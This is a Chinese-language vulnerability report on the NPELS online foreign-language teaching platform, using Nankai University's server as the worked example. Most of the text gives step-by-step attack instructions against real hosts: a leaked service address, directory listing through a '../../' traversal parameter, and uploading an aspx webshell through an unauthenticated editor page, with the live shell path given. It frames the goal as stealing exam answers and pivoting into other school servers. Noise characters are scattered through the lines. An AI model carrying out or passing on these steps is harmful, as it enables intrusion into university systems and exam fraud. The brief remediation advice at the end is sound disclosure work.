新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中

9 Z- ?5 ]( |; j" o详细说明：

* y, ]) K" C: R3 }3 j) T% `% `以南开大学的为例:
http://222.30.60.3/NPELS
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
' D- v/ N6 K4 u' N, E, }9 Q<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
</setting>
6 A2 @' M2 ~, \! e  _及版本号
. z9 Y# R. x  K2 H* Z$ |) H. {0 [<add key="TVersion" value="1, 0, 0, 2187">
4 f* G# V; D+ z/ L</add>
0 p) b( k1 p" [6 x直接访问
$ k! t8 i4 M6 v% {: R* h  ihttp://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作，直接 HTTP GET 列目录：
5 R0 X9 T& R# Nhttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
! u. d* r/ u2 v1 L! c, ihttp://222.30.60.3/NPELS/CommonS ... List?version=../../
1 Z  f; P8 p# i1 @  ^5 ?1 E2 T
发现
7 G* b1 K4 o# Vhttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
3 g" q! e, L0 S' M! f: n. F7 x上传后继续列目录找到木马地址直接访问即可

" [( l+ D1 B1 r+ V$ r: |0 p: }OOXX
) c$ N/ x' I4 m# X9 x
Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
漏洞证明：

' ~, m6 b( m# A: o. {, q3 F列目录：
- f& w1 S- M; M- _  c" ]http://222.30.60.3/NPELS/CommonS ... List?version=../../
9 _8 {3 v  s9 D+ U. [% M文件上传：
http://222.30.60.3/npelsv/editor/editor.htm

" ]) b' j; I; o$ f* M& }上传木马：
5 l5 L$ D- S1 K: `' |& b% q4 a0 rhttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
$ J* ]1 K  C8 m
修复方案：
8 |) M& m  R1 P6 C4 S4 e3 M0 B* }( b好像考试系统必须使用 CommonService.asmx
, b  V5 q; G) Q最好配置文件加密或者用别的方式不让它泄露出来
并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​
+ Q; l2 I2 B+ p1 V! O  H3 y" H